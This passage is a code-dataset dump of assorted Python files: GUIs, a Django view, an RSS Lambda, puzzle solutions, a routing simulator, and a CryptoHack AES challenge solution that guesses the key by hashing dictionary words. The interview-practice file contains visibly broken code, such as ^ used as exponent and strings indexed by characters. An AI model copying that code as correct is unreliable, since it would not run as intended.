设置线程为守护线程,防止退出主线程时,子线程仍在运行\n self.th.setDaemon(True)\n # 新线程启动\n self.th.start()\n # 利用line Edit控件对象text()函数获取界面输入\n\n def lc(self):\n cloudLyric(self.user_idEdit.text(), self.shapeBox.currentText(), self.fontBox.currentText())\n pix = QPixmap(r'./data/wordcloud/' + self.user_idEdit.text() + '_lyricCloud.png')\n self.cloud_label.setPixmap(pix)\n # 自适应QLabel大小\n self.cloud_label.setScaledContents(True)\n\n def cloudArtist(self):\n self.th = threading.Thread(target=self.ca)\n # 设置线程为守护线程,防止退出主线程时,子线程仍在运行\n self.th.setDaemon(True)\n # 新线程启动\n self.th.start()\n\n def ca(self):\n cloudArtist(self.user_idEdit.text(), self.shapeBox.currentText(), self.fontBox.currentText())\n pix = QPixmap(r'./data/wordcloud/' + self.user_idEdit.text() + '_artistCloud.png')\n self.cloud_label.setPixmap(pix)\n # 自适应QLabel大小\n self.cloud_label.setScaledContents(True)\n\n def shapeFile(self):\n Shapelist = os.listdir(r\"./data/wordcloud/shape\")\n for item in Shapelist:\n self.shapeBox.addItem(item)\n\n def fontFile(self):\n Fontlist = os.listdir(r\"./data/wordcloud/font\")\n for item in Fontlist:\n self.fontBox.addItem(item)\n\n def open_file(self): # 打开文件夹\n # f'{os.getcwd()}\\data\\wordcloud'\n os.startfile(r'.\\data\\wordcloud')\n\n def open_Shapefile(self): # 打开文件夹\n # f'{os.getcwd()}\\data\\wordcloud'\n os.startfile(r'.\\data\\wordcloud\\shape')\n\n def open_Fontfile(self): # 打开文件夹\n # f'{os.getcwd()}\\data\\wordcloud'\n os.startfile(r'.\\data\\wordcloud\\font')\n\n\n def getinf(self):\n self.th = threading.Thread(target=self.gi)\n # 设置线程为守护线程,防止退出主线程时,子线程仍在运行\n self.th.setDaemon(True)\n # 新线程启动\n self.th.start()\n\n def getinf_2(self):\n self.th = threading.Thread(target=self.gi2)\n # 设置线程为守护线程,防止退出主线程时,子线程仍在运行\n self.th.setDaemon(True)\n # 新线程启动\n self.th.start()\n\n def gi(self):\n i = 0\n if self.user_idEdit.text() == \"\" and self.music_table.rowCount() == 0:\n inf = sql.get_musics()\n self.music_table.insertColumn(0)\n self.music_table.setHorizontalHeaderLabels(['用户id', '歌曲id', '歌曲名', '歌手'])\n for item in inf:\n self.music_table.insertRow(i)\n self.music_table.setItem(i, 0, QTableWidgetItem(str(item['user_id'])))\n self.music_table.setItem(i, 1, QTableWidgetItem(str(item['music_id'])))\n self.music_table.setItem(i, 2, QTableWidgetItem(str(item['music_name'])))\n self.music_table.setItem(i, 3, QTableWidgetItem(str(item['nickname'])))\n i += 1\n self.music_table.update()\n else:\n self.clear()\n inf = sql.get_music_table(self.user_idEdit.text())\n for item in inf:\n self.music_table.insertRow(i)\n self.music_table.setItem(i, 0, QTableWidgetItem(str(item['music_id'])))\n self.music_table.setItem(i, 1, QTableWidgetItem(str(item['music_name'])))\n self.music_table.setItem(i, 2, QTableWidgetItem(str(item['nickname'])))\n i += 1\n self.music_table.update()\n\n def gi2(self):\n i = 0\n if self.user_idEdit.text() == \"\" and self.music_table_2.rowCount() == 0:\n inf = sql.get_lyrics()\n for item in inf:\n self.music_table_2.insertRow(i)\n self.music_table_2.setItem(i, 0, QTableWidgetItem(str(item['music_id'])))\n self.music_table_2.setItem(i, 1, QTableWidgetItem(str(item['lyric'])))\n i += 1\n self.music_table_2.update()\n else:\n self.clear2()\n inf = sql.get_lyric_table(self.user_idEdit.text())\n for item in inf:\n self.music_table_2.insertRow(i)\n self.music_table_2.setItem(i, 0, QTableWidgetItem(str(item['music_id'])))\n self.music_table_2.setItem(i, 1, QTableWidgetItem(str(item['lyric'])))\n i += 1\n self.music_table_2.update()\n\n def searchlyr(self):\n if self.music_idEdit.text() != \"\":\n text = searchLyr(self.music_idEdit.text())\n cursor = self.lyric_Browser.textCursor()\n cursor.movePosition(QtGui.QTextCursor.End)\n cursor.insertText(text)\n self.lyric_Browser.setTextCursor(cursor)\n self.lyric_Browser.ensureCursorVisible()\n\n def clear(self):\n count = self.music_table.rowCount()\n if self.music_table.columnCount() == 4:\n self.music_table.removeColumn(0)\n for _ in range(count):\n self.music_table.removeRow(0)\n\n def clear2(self):\n count = self.music_table_2.rowCount()\n for _ in range(count):\n self.music_table_2.removeRow(0)\n\n def clear3(self):\n self.music_idEdit.setText('')\n self.lyric_Browser.setText('')\n\n def meBtn(self):\n QtGui.QDesktopServices.openUrl(QtCore.QUrl('https://github.com/Olvi73'))\n\n\n\n\n# 保存日志\nclass Logger(object):\n def __init__(self, filename=\"./Default.log\"):\n self.terminal = sys.stdout\n self.log = open(filename, \"a\")\n\n def write(self, message):\n self.terminal.write(message)\n self.log.write(message)\n\n def flush(self):\n pass\n\n\nif __name__ == '__main__':\n # 多线程打包\n multiprocessing.freeze_support()\n path = os.path.abspath(os.path.dirname(__file__))\n\n # 固定的,PyQt5程序都需要QApplication对象。sys.argv是命令行参数列表,确保程序可以双击运行\n app = QApplication(sys.argv)\n # 初始化\n myWin = MyMainForm()\n # 将窗口控件显示在屏幕上\n myWin.show()\n\n sys.stdout = Logger('./log.txt')\n\n # 清空数据库\n # sql.truncate_all()\n # print(\"清空数据库完成\")\n\n # 程序运行,sys.exit方法确保程序完整退出。\n sys.exit(app.exec_())\n","repo_name":"Olvi73/163MusicSA_PE","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11683,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"} +{"seq_id":"37175831751","text":"from django.db.models import Q\nfrom django.core.paginator import Paginator, EmptyPage\n\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom customer.models import Order\nfrom customer.serializers import OrderWithProductListSerializer\nfrom customer.utils import paginator_imitation\n\n\n@api_view([\"GET\"])\n@permission_classes([IsAuthenticated])\ndef admin__get_orders(request):\n \"\"\"\n Returns a list of orders to the admin page using paginator.\n\n GET parameters:\n If state:\n accepted -> orders with state \"Accepted\"\n completed -> orders with state \"Completed\"\n canceled -> orders with state \"Canceled\"\n any -> all orders\n\n date_order: \"asc\" or \"desc\" - order by created_date\n page: number of in order paginator\n per_page: number of orders in page in order paginator\n\n Available only for customers with admin permission.\n \"\"\"\n if not request.user.customer.admin_permission:\n return Response({\"error\": f\"Not enough rights.\"}, status=403)\n\n ordering = request.GET.get(\"ordering\", \"desc\")\n state = request.GET.get(\"state\", \"Any\")\n\n try:\n filter_query = {\n \"Accepted\": Q(state=\"Accepted\"),\n \"Completed\": Q(state=\"Completed\"),\n \"Canceled\": Q(state=\"Canceled\"),\n \"Any\": Q(),\n }[state]\n except KeyError:\n return Response({\n \"error\": \"Invalid order-state GET parameter. \"\n \"it can only take the values: \"\n \"Accepted, Completed, Cancelled or Any.\"\n }, status=400)\n else:\n result = paginator_imitation(\n Order.objects\n .filter(filter_query)\n .order_by(f\"{'-' if ordering == 'desc' else ''}created_date\"),\n request.GET.get(\"page\", 1), request.GET.get(\"per-page\", 10)\n )\n\n return Response(OrderWithProductListSerializer(\n result, many=True\n ).data)\n","repo_name":"DevCrusader/UStoreAPI","sub_path":"project/customer/views/admin__get_orders.py","file_name":"admin__get_orders.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72222889535","text":"import json\nimport requests\nimport xmltodict\n\ndef lambda_handler(event, context):\n # print('event: ', event)\n rss_url = get_rss_url(event)\n feed = requests.get(rss_url)\n parsed = xmltodict.parse(feed.text)\n rss_as_json = json.dumps(parsed)\n response = {\n 'headers': headers(),\n 'body': rss_as_json,\n 'statusCode': 200\n }\n return response\n\ndef get_rss_url(event):\n query_params = event['queryStringParameters']\n print('queryStringParameters: ', query_params)\n rss_url = query_params['rss_url']\n return rss_url\n\ndef headers():\n return {\n 'Access-Control-Allow-Origin' : '*', # Required for CORS support to work\n }\n\n# with open('result.json', 'w') as f:\n# print(result, file=f) # Python 3.x\n","repo_name":"dsanch3z/podcastr-api","sub_path":"podcastr.py","file_name":"podcastr.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21022927819","text":"import requests\nimport bs4\nfrom datetime import date,datetime\n\ni=0\n\nsite=requests.get(\"http://datak.ir/mydatak/service_profile?detail_id=profile.show&oid=81336487\")\nsoup=bs4.BeautifulSoup(site.content.decode(\"UTF-8\"), 'html.parser')\nfor link in soup.findAll(\"span\"):\n if(i==1): \n v= float(link.string)\n i=0\n if(link.string==\"صفحه اصلی\"):\n i=1\n \nf_date = date(2020, 6, 6)\nl_date = datetime.now().date()\nd = (l_date - f_date).days\n\nprint(\"حجم:\",v)\nprint(\"زمان گذشته:\",d)\nif((100-v)/d>3.33):\n print(\"ریحانه داره اینترنتو میخوره\")\nelse:\n print(\"وضع خوبه\")","repo_name":"ahjafar/datak","sub_path":"datak.py","file_name":"datak.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8469639228","text":"from pynput.keyboard import Key, Controller\nimport numpy as np \nimport cv2\n\n#######################\n### SETUP CONSTANTS ###\n#######################\n\n# Thresholds before sensing inputs\nx_threshold = 50\ny_threshold = 50\n\n# The keys to press\nkey_x_below_threshold = Key.right # x < x_threshold\nkey_x_above_threshold = Key.left # x > x_threshold\nkey_y_below_threshold = Key.down # y < y_threshold\nkey_y_above_threshold = Key.up # y > y_threshold\n\n############################\n### FUNCTION DEFINITIONS ###\n############################\n\n# Converts screen coordinates to cartesian coordinates\ndef cartesian_coordinates(sx, sy, fw, fh):\n cx = sx - (fw/2)\n cy = (fh/2) - sy\n return (cx, cy)\n\n# Gets the midpoint of a box\ndef middle_of_box (x,y,w,h):\n mx = x + (w/2)\n my = y + (h/2)\n return mx, my\n\n########################\n### MAIN CODE MODULE ###\n########################\n\ndef main():\n wait_for_inputs = False\n\n # Keyboard Controller for inputs\n keyboard = Controller()\n\n # Haar Cascade for face detction\n face_cascade = cv2.CascadeClassifier(\"haarcascade_frontalface_alt2.xml\")\n\n # The webcam capture\n cap = cv2.VideoCapture(0)\n f_width = cap.get(3)\n f_height = cap.get(4)\n\n while(True):\n\n ret, frame = cap.read()\n\n # Detect the faces\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, scaleFactor=1.5, minNeighbors=5)\n\n for (x,y,w,h) in faces:\n # Convert to cartesian\n mx, my = middle_of_box(x,y,w,h)\n cx, cy = cartesian_coordinates(mx,my,f_width,f_height)\n print(cx, cy)\n \n # Control the inputs based on the position of the face\n if (wait_for_inputs):\n if (cx < -x_threshold):\n keyboard.press(key_x_below_threshold)\n elif (cx > x_threshold):\n keyboard.press(key_x_above_threshold)\n if (cy < -y_threshold):\n keyboard.press(key_y_below_threshold)\n elif (cy > y_threshold):\n keyboard.press(key_y_above_threshold)\n\n # Draw a rectangle at the face\n rect_color = (255,0,0)\n stroke = 2\n end_x = x + w\n end_y = y + h\n cv2.rectangle(frame, (x,y), (end_x,end_y), rect_color, stroke)\n\n # The web cam frame\n cv2.imshow('WebCam',frame)\n if cv2.waitKey(1) & 0xFF == ord('i'):\n wait_for_inputs = True\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n # When done, exit cleanly\n cap.release()\n cv2.destroyAllWindows()\n \nif __name__ == \"__main__\":\n main()","repo_name":"alfi-s/face_controller","sub_path":"detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18571148843","text":"import math\n\n\ndef solve(n, q, a_list, lr_list):\n m = max(a_list)\n adds = [0] * (n + 1)\n for i in range(3, n + 1):\n adds[i] = (i * (i - 1) * (i - 2)) // 6\n # print(adds)\n # mo's algorithm\n sort_list = []\n for i, (l, r) in enumerate(lr_list):\n d = int(math.sqrt(l))\n sort_list.append((l - 1, r - 1, d, i))\n sort_list = sorted(sort_list, key=lambda x: (x[2], x[1]))\n # print(sort_list)\n counter = [0] * (m + 1)\n for a in a_list:\n counter[a] += 1\n adds_list = [0] * (m + 1)\n for i in range(m + 1):\n adds_list[i] = adds[counter[i]]\n res = sum(adds_list)\n left = 0\n right = n - 1\n res_list = [0] * q\n # print(counter)\n for l, r, _, i in sort_list:\n # print(l, r, left, right)\n while left < l:\n a = a_list[left]\n counter[a] -= 1\n res -= adds[counter[a] + 1] - adds[counter[a]]\n left += 1\n while left > l:\n a = a_list[left - 1]\n counter[a] += 1\n res += adds[counter[a]] - adds[counter[a] - 1]\n left -= 1\n while right > r:\n a = a_list[right]\n counter[a] -= 1\n res -= adds[counter[a] + 1] - adds[counter[a]]\n right -= 1\n while right < r:\n a = a_list[right + 1]\n counter[a] += 1\n res += adds[counter[a]] - adds[counter[a] - 1]\n right += 1\n res_list[i] = res\n # print(counter)\n # print(res)\n # print(res_list)\n return res_list\n\n\ndef main():\n n, q = map(int, input().split())\n a_list = list(map(int, input().split()))\n lr_list = [tuple(map(int, input().split())) for _ in range(q)]\n res = solve(n, q, a_list, lr_list)\n for r in res:\n print(r)\n\n\ndef test():\n assert solve(10, 4, [2, 7, 1, 8, 2, 8, 1, 8, 2, 8], [(1, 10), (1, 9), (2, 10), (5, 5)]) == [5, 2, 4, 0]\n\n\nif __name__ == \"__main__\":\n test()\n main()\n","repo_name":"k-harada/AtCoder","sub_path":"ABC/ABC251-300/ABC293/G.py","file_name":"G.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"79"} +{"seq_id":"11965194693","text":"from dash import Dash, dcc, html, Input, Output, no_update\nimport pandas as pd\nimport plotly.express as px\n\n# Reading data\ndf = pd.read_table(\n \"https://raw.githubusercontent.com/plotly/datasets/master/global_super_store_orders.tsv\"\n)\n\n# Transforming column types so that datetime functions can be applied correctly\ndf[\"Order Date\"] = pd.to_datetime(df[\"Order Date\"])\ndf[\"Profit\"] = df[\"Profit\"].str.replace(\",\", \".\")\ndf[\"Profit\"] = df[\"Profit\"].astype(\"float\")\n\n\n# Transforming 'Order Date' column into yyyy-mm format\ndf[\"year_month\"] = pd.DatetimeIndex(df[\"Order Date\"]).to_period(\"M\").astype(str)\n\n# Grouping data as per 'Order Date' dimension.\n# Getting time series - profit per month.\ndf_grouped = (\n df[[\"Order Date\", \"Profit\"]]\n .groupby(by=pd.Grouper(key=\"Order Date\", axis=0, freq=\"M\"))\n .sum()\n .reset_index()\n)\n\n# Creating base bar chart.\n# Why 'base'? --> Because it will be shown on page all the time.\n# Below there is one bar chart that will be shown only on hover.\nfig = px.bar(data_frame=df_grouped, x=\"Order Date\", y=\"Profit\", template=\"simple_white\")\n\nfig.update_layout(margin=dict(t=50, l=25, r=25, b=25))\n\n# turn off native plotly.js hover effects - make sure to use\n# hoverinfo=\"none\" rather than \"skip\" which also halts events.\nfig.update_traces(hoverinfo=\"none\", hovertemplate=None)\n\n\napp = Dash(__name__)\n\napp.layout = html.Div(\n [\n html.H4(\"Dash Tooltip Example\", style={\"textAlign\": \"center\"}),\n # Base bar chart i.e. bar chart that will always be shown on map.\n dcc.Graph(id=\"tooltip-graph-basic-2\", figure=fig, clear_on_unhover=True),\n # Component that will be updated when on hover.\n # Here will come graph created in display_hover callback function.\n dcc.Tooltip(id=\"tooltip-graph\", direction=\"left\"),\n ]\n)\n\n\n@app.callback(\n Output(\"tooltip-graph\", \"show\"),\n Output(\"tooltip-graph\", \"bbox\"),\n Output(\"tooltip-graph\", \"children\"),\n Input(\"tooltip-graph-basic-2\", \"hoverData\"),\n)\ndef display_hover(hover_data):\n\n # Do not show tooltip popup window if mouse is not hovered over\n if hover_data is None:\n return False, no_update, no_update\n\n # print(hover_data)\n # Here we are getting data about X-axis of hovered bar chart\n # i.e. we are interested in date of hovered bar.\n x = hover_data[\"points\"][0][\"x\"]\n\n # Here we are filtering first 7 digits of date value.\n # Why first 7? --> Because we want to have year and month.\n # In day we are not interested.\n date_month = x[:7]\n\n # Filtering initial DataFrame in order to get specific month.\n df_filtered = df.query(f\"year_month == '{date_month}'\")\n\n # Grouping data so that we have DataFrame grouped as per 'Segment' dimension.\n df_filtered_grouped = (\n df_filtered[[\"Segment\", \"Profit\"]].groupby(by=\"Segment\").sum().reset_index()\n )\n\n # Creating Plotly figure that will be shown in tooltip\n fig1 = px.bar(\n data_frame=df_filtered_grouped, x=\"Segment\", y=\"Profit\", template=\"simple_white\"\n )\n fig1.update_layout(margin=dict(t=0, l=0, r=0, b=0))\n\n # Purpose of following two lines is to get info about bounding box i.e.\n # about coordinates of popup window/tooltip window that will be created.\n pt = hover_data[\"points\"][0]\n bbox = pt[\"bbox\"]\n\n children = [\n html.Div(\n [\n html.H4(f\"Year-Month: {date_month}\"),\n dcc.Graph(figure=fig1),\n ],\n style={\"width\": \"200px\", \"height\": \"200px\", \"whiteSpace\": \"normal\"},\n )\n ]\n\n return True, bbox, children\n\n\nif __name__ == \"__main__\":\n app.run_server(debug=True)\n","repo_name":"AnnMarieW/dash-app-gallery","sub_path":"examples/tooltip.py","file_name":"tooltip.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"79"} +{"seq_id":"40756428948","text":"\ndef receiver():\n \"\"\"Using yield as a receiver\"\"\"\n while True:\n item = yield\n print(\"Got: \", item)\n\nif __name__ == '__main__':\n # create generator\n c = receiver()\n print(c)\n # advance to yield\n next(c)\n # now you can send stuff\n c.send(43)\n c.send([1, 2, 3])\n c.send(\"Hello\")\n","repo_name":"soltysh/talks","sub_path":"2014/pyconpl/examples/generator2.py","file_name":"generator2.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"79"} +{"seq_id":"33816659352","text":"from cryptography.fernet import Fernet\r\nimport mysql.connector\r\nimport os\r\nimport random\r\n###Encryption layer for the Game Console\r\nprint(\"[ ENCRYPTION ] : Encryption layer for the Zauth system has been loaded\")\r\n#key=\"I8sMQvPAFHA3VHFn0i-lOLSF5SZKusCRWxXaWs14eX4=\"\r\n#key2=\"deA6J0ynM309jkn4o4nYyGhecnqRaQBL4IjOxXRF1tM=\"\r\ndef encrypt(ins,key):\r\n print(\"[ ENCRYPTION ] : Encrypting using key: \"+str(key))\r\n cipher_suite= Fernet(key)\r\n\r\n #print(\"encrypting:\"+str(ins))\r\n rand=random.randint(0,1)\r\n# print(rand)\r\n if rand==1:\r\n cipher_text=cipher_suite.encrypt(ins.encode())\r\n try:\r\n cipher_text2=cipher_suite.encrypt(cipher_text.encode())\r\n except:\r\n cipher_text2=cipher_suite.encrypt(cipher_text)\r\n else:\r\n cipher_text=cipher_suite.encrypt(ins.encode())\r\n\r\n return cipher_text\r\ndef decrypt(ins,key):\r\n cipher_suite= Fernet(key)\r\n x=1\r\n #print('Decrypting:'+str(ins))\r\n plain_text = cipher_suite.decrypt(ins.encode())\r\n\r\n try:\r\n x=x+1\r\n #print(\"Attempting decrypt\"+str(x))\r\n plain_text=cipher_suite.decrypt(plain_text.encode())\r\n except:\r\n try:\r\n #print(\"Attempting decrypt\"+str(x))\r\n plain_text=cipher_suite.decrypt(plain_text)\r\n except:\r\n pass\r\n try:\r\n return plain_text.decode()\r\n except:\r\n return plain_text\r\n","repo_name":"zapinator3000/Zauth4","sub_path":"Zauth4_Server/encryption.py","file_name":"encryption.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3124388651","text":"#!/usr/bin/python3\nfrom Crypto.Cipher import AES\nimport hashlib\nimport random\n\n# https://gist.githubusercontent.com/wchargin/8927565/raw/d9783627c731268fb2935a731a618aa8e95cf465/words\nwith open(\"/home/adam/projects/github/crypto_hack/aes/password_as_keys/dictionary_words\") as f:\n words = [w.strip() for w in f.readlines()]\n\nciphertext = \"c92b7734070205bdf6c0087a751466ec13ae15e6f1bcdd3f3a535ec0f4bbae66\"\n\ndef decrypt(ciphertext, KEY):\n ciphertext = bytes.fromhex(ciphertext)\n\n cipher = AES.new(KEY, AES.MODE_ECB)\n try:\n decrypted = cipher.decrypt(ciphertext)\n except ValueError as e:\n return {\"error\": str(e)}\n\n return {\"plaintext\": decrypted.hex()}\n\n\n\nfor w in words:\n keyword = w\n KEY = hashlib.md5(keyword.encode()).digest()\n tmp = decrypt(ciphertext, KEY)['plaintext']\n if \"63727970746f7b\" in tmp: #63727970746f7b crypto\n print(keyword)\n print(tmp)\n print(KEY)\n print(bytes.fromhex(KEY).decode('utf-8'))\n ","repo_name":"adamkrawczyk/crypto_hack_solutions","sub_path":"aes/password_as_keys/2-password_as_key.py","file_name":"2-password_as_key.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"10103088021","text":"import numpy as np\nimport math\n\ndef sigmoid(x):\n return 1 / (1 + math.exp(-x))\n\ndef softmax(x):\n \"\"\"Compute softmax values for each sets of scores in x.\"\"\"\n return np.exp(x) / np.sum(np.exp(x), axis=0)\n\nprint(sigmoid(6))\nprint(sigmoid(7))\nprint(sigmoid(20))\n\ntmp1 = softmax([5,6,5.5])\ntmp2 = softmax([2.7,2.8,4.2,])\ntmp3 = softmax([9.7,9.8,6.4])\n","repo_name":"sohcalvin/ref","sub_path":"python/ttt.py","file_name":"ttt.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"70503720256","text":"from lib.funcionalidades import *\r\nfrom time import sleep\r\n\r\n# ------------------------------------------------------------------------\r\n# Mensagens prontas\r\n# ------------------------------------------------------------------------\r\n\r\ndef mensagem(txt):\r\n qnt = len(txt) + 4\r\n print('~'*qnt)\r\n print(txt.center(qnt))\r\n print('~'*qnt)\r\n\r\n# ------------------------------------------------------------------------\r\n# Mostrar valor e produtos comprados\r\n# ------------------------------------------------------------------------\r\n\r\ndef final():\r\n count = 0\r\n try:\r\n arq2 = open('dadosTemp.txt', 'r')\r\n txt = 'RESUMO DA COMPRA'\r\n print('~'*115)\r\n print(txt.center(115))\r\n print('~'*115)\r\n for linha in arq2:\r\n dado = linha.split(';')\r\n dado[3] = dado[3].replace('\\n', '')\r\n converte2 = float(dado[3])\r\n count += converte2\r\n print('-'*115)\r\n print(f'Código: {dado[0]:<20} Produto: {dado[1]:<20} Quantidade: {dado[2]:<20} Total: R${dado[3]:<20}')\r\n sleep(0.5)\r\n print('-'*115)\r\n print(f'Total da Compra: R${count}')\r\n dinheiro = leiaFloat('Digite o dinheiro recebido: ')\r\n conta = dinheiro - count\r\n if conta == 0:\r\n print('Não é necessário troco')\r\n else:\r\n print(f'Troco: R${conta}')\r\n except:\r\n print('Houve um erro ao abrir o arquivo')\r\n finally:\r\n arq2 = open('dadosTemp.txt', 'w')\r\n arq2.write('')\r\n ","repo_name":"Gabriel-R14/caixa-registradora-v2","sub_path":"lib/interface/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"35926028162","text":"\"\"\" Welcome to Meta!\nThis is just a simple shared plaintext pad,\nwith no execution capabilities.\n\nWhen you know what language you would like\nto use for your interview, simply choose it\nfrom the dropdown in the top bar.\n\nEnjoy your interview!\n\n# question 1\n\nGiven a string of characters, write a method that returns\ntrue if the string represents a valid number.\n\n\"13\" - --> true\n\"3.0\" - --> true\n\"-7.4\" - --> true\n\"-13.5\" - --> true\n\"abc\" - --> false\n\"123a\" - --> false\n\"-.\" - --> false\n\"-..--\" - --> false\n\"1.0.0.1\" -> false\n\n\"\"\"\nimport pandas as pd\n\n\ndef check_string_ints(s: str) -> bool:\n for i in s:\n try:\n char = int(s[i])\n except error as e:\n print(f\"found a string not int {e}\")\n if type(char) == int:\n return True\n else:\n return False\n\n\ndef check_string_int(s: str) -> bool: # \"123a\" # 3.0\"\n n = len(s)\n sub = s[0] # '3'\n for i in s: # 1\n if int(sub): # int('3.5')\n sub += s[i + 1] # '3.'\n result = True\n else:\n return False\n return result\n\n\n\"\"\"\n#question 2\n\nGiven the coordinates of a facebook user and some\nshops, return the k shops closest to the user\n\nInput:\nuser = (3, 1)\nk = 2\nshops = (\"A\", 3, 3), (\"B\", 9, 1)(\"C\", 4, 2)\n\nOutput: [\"A\", \"C\"]\n\n// |\n// | A\n// | C\n// | *B\n// --o - -----------\n// |\n\"\"\"\nfrom math import sqrt\n\n\ndef euclidean_distance(a, b, c, d):\n return sqrt((a - c) ^ 2 + (b - d) ^ 2)\n\n\nuser = (3, 1)\nshops = [(\"A\", 3, 3), (\"B\", 9, 1), (\"C\", 4, 2), (\"Z\", 1, 2)]\n\n\ndef find_closest_k_shops(k, person, location):\n shop_dict = {}\n # i=o (\"A\",3,3)\n for i in location: # euclidean_distance(3, 1, 3, 3)\n shop_dict[location[i][0]] = euclidean_distance(\n *person, *location[i][1:2]\n ) # location[i][0] =\"A\" 3, 1 location[i][1:2]=(3,3) 3, 3\n df = pd.DataFrame(shop_dict)\n sorted_values = sorted(df.values)\n return list(sorted_values.index[k])\n\n\nx = find_closest_k_shops(5, user, shops)\n","repo_name":"mconwa02/gcp_prep","sub_path":"04_interview_code.py","file_name":"04_interview_code.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"19871578137","text":"# https://tech-blog.optim.co.jp/entry/2019/12/09/080000\n# 結構早い\n\nimport sys\n\ndef wc_block_64k(name, blocksize=65536):\n def blocks(f):\n while True:\n b = f.read(blocksize)\n if b:\n yield b\n else:\n break\n\n with open(name, 'r') as f:\n return sum(bl.count('\\n') for bl in blocks(f))\n","repo_name":"nepia11/python-fast-line-counter","sub_path":"wc.py","file_name":"wc.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"35500921990","text":"import copy\nimport json\nimport math\n\nfrom simulator.node import Node\n\n\nclass Distance_Vector:\n def __init__(self, cost: int, path: list):\n self.cost = cost\n self.path = path\n\n def __eq__(self, another):\n return self.cost == another.cost and self.path == another.path\n\n\nclass Distance_Vector_Node(Node):\n def __init__(self, id):\n super().__init__(id)\n self.distance_vectors_self = {}\n self.distance_vectors_neighbor = {}\n self.sequence_number = 0\n self.neighbor_link_cost = {}\n self.neighbor_sequence_numbers = {}\n\n def __str__(self): #done\n message = {}\n message[\"self_sequence_number\"] = self.sequence_number\n self.sequence_number += 1\n for dst, val in self.distance_vectors_self.items():\n dict = {}\n dict[\"path\"] = val.path\n dict[\"cost\"] = val.cost\n message[dst] = dict\n return json.dumps(message)\n\n def link_has_been_updated(self, neighbor, latency):\n if latency == -1:\n self.delete_link(neighbor)\n else:\n self.neighbor_link_cost[neighbor] = latency\n self.update_dvs()\n\n def delete_link(self,neighbor: int):\n self.neighbor_link_cost.pop(neighbor)\n self.distance_vectors_neighbor.pop(neighbor)\n self.distance_vectors_self.pop(neighbor)\n\n def update_dvs(self):\n old_dvs = copy.deepcopy(self.distance_vectors_self)\n self.distance_vectors_self = {}\n self.update_self_neighbour()\n for source, dvs in self.distance_vectors_neighbor.items():\n for destination, dv in dvs.items():\n if source in self.neighbor_link_cost:\n new_cost = self.neighbor_link_cost[source] + dv.cost\n if destination not in self.distance_vectors_self:\n self.update_cost(destination,dv,new_cost)\n if destination in self.distance_vectors_self and new_cost < self.distance_vectors_self[destination].cost:\n self.update_cost(destination, dv, new_cost)\n if self.distance_vectors_self != old_dvs: #eq\n self.send_to_neighbors(str(self))\n\n def update_self_neighbour(self):\n for neighbor, link_cost in self.neighbor_link_cost.items():\n path = [self.id, neighbor]\n self.distance_vectors_self[neighbor] = Distance_Vector(link_cost, path)\n\n def update_cost(self, dst:int, dv:Distance_Vector, newcost:int):\n new_path = [self.id] + copy.deepcopy(dv.path)\n self.distance_vectors_self[dst] = Distance_Vector(newcost, new_path)\n # Fill in this function\n\n\n\n def process_incoming_routing_message(self, m):\n distance_vector_neighbor_message,sequence_number = self.processJson(m)\n flag = False\n id1 = next(iter(distance_vector_neighbor_message))\n id2 = \"path\"\n neighbor = int(distance_vector_neighbor_message[id1][id2][0])\n to_delete = []\n if neighbor not in self.distance_vectors_neighbor:\n self.distance_vectors_neighbor[neighbor] = {}\n if neighbor in self.neighbor_sequence_numbers:\n if sequence_number < self.neighbor_sequence_numbers[neighbor]:\n return\n for dst, value in self.distance_vectors_neighbor[neighbor].items():\n if(str(dst) not in distance_vector_neighbor_message):\n to_delete.append(dst)\n for dst_str, value in distance_vector_neighbor_message.items():\n dst = int(dst_str)\n link = Distance_Vector(value['cost'], value['path'])\n\n looped = (self.id in link.path)\n if(not ((dst not in self.distance_vectors_neighbor[neighbor]) and looped)):\n flag = True\n if (dst in self.distance_vectors_neighbor[neighbor]):\n if(looped):\n self.distance_vectors_neighbor[neighbor].pop(dst) #distance_vectors_neighbor is the dict of dict\n else:\n self.distance_vectors_neighbor[neighbor][dst] = link\n else:\n if(not looped):\n self.distance_vectors_neighbor[neighbor][dst] = link\n\n\n if(len(to_delete) > 0):\n flag = True\n for dst in to_delete:\n self.distance_vectors_neighbor[neighbor].pop(dst)\n self.neighbor_sequence_numbers[neighbor] = sequence_number\n if 